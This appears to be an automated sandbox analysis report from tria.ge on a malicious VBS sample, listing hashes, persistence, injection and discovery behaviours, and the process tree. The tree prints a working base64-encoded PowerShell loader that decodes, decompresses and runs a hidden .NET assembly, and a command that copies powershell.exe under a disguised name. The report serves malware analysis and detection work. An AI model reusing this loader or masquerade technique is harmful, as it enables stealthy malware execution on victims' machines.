Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
11/09/2024, 11:53
Static task
static1
Behavioral task
behavioral1
Sample
870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
Resource
win10v2004-20240802-en
General
-
Target
870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
-
Size
2.4MB
-
MD5
bd7a77c470549aad52435b8b7b785c36
-
SHA1
b18ff781161ff4c4bb3e91825053bed3d280ed20
-
SHA256
870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371
-
SHA512
7217805ec612b984672c4cd498b0cc3d8e9cc463fab70bef0fdd96276f1fe93425e03777999c266a876161444699bb09738d2b19154b378316af6118cc48445a
-
SSDEEP
49152:xBy7kDIlpNx0KQTuJlDl7QVqXhmfOUJ3bapil:a1o
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2592 2040 cmd.exe 84 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2028 created 3548 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 56 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qgeacb = "C:\\Users\\Admin\\AppData\\Roaming\\Qgeacb.vbs" 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2028 set thread context of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe Token: SeDebugPrivilege 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2168 InstallUtil.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2496 wrote to memory of 2028 2496 WScript.exe 90 PID 2496 wrote to memory of 2028 2496 WScript.exe 90 PID 2496 wrote to memory of 2028 2496 WScript.exe 90 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95 PID 2028 wrote to memory of 2168 2028 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe 95
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3548
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe"C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" -enc JABDAGoAbgB4AHYAeABrAGUAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABPAHQAcgBnAGYAagBkACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQwBqAG4AeAB2AHgAawBlAG0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAVQBzAGwAeQByAGkAbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABPAHQAcgBnAGYAagBkAC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABJAGQAegByAGsAZQB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABVAHMAbAB5AHIAaQBvACAAKQA7ACQAUAB6AHIAagBnAG0AegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUwBiAHkAaABnAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASQBkAHoAcgBrAGUAeQAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUwBiAHkAaABnAHMALgBDAG8AcAB5AFQAbwAoACAAJABQAHoAcgBqAGcAbQB6ACAAKQA7ACQAUwBiAHkAaABnAHMALgBDAGwAbwBzAGUAKAApADsAJABJAGQAegByAGsAZQB5AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAVQBzAGwAeQByAGkAbwAgAD0AIAAkAFAAegByAGoAZwBtAHoALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFUAcwBsAHkAcgBpAG8AKQA7ACAAJABMAHgAZQBzAG4AaQB2AGMAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAFUAcwBsAHkAcgBpAG8AKQA7ACAAJABDAGMAdABqAG4AawBjAHoAIAA9ACAAJABMAHgAZQBzAG4AaQB2AGMAaAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEMAYwB0AGoAbgBrAGMAegAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAQwBjAHQAagBuAGsAYwB6AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2168
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:2592
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD590275db9e496b3f36153d0be0d66d7c4
SHA16cf1dc1d7737b742f7ec166654e20e8df6b65b3c
SHA256e59b43a5b37c884fc546d5629003f26e96213b1cb4061882e8425272d18827a5
SHA5126f70f7101307acfe1a6476ec235e78804bd102debc59d2ddc3bbbec1a289e8ed061086d804a3194e026be5f91a212900bd7511f91091322a5de14db62bdb6543
-
C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82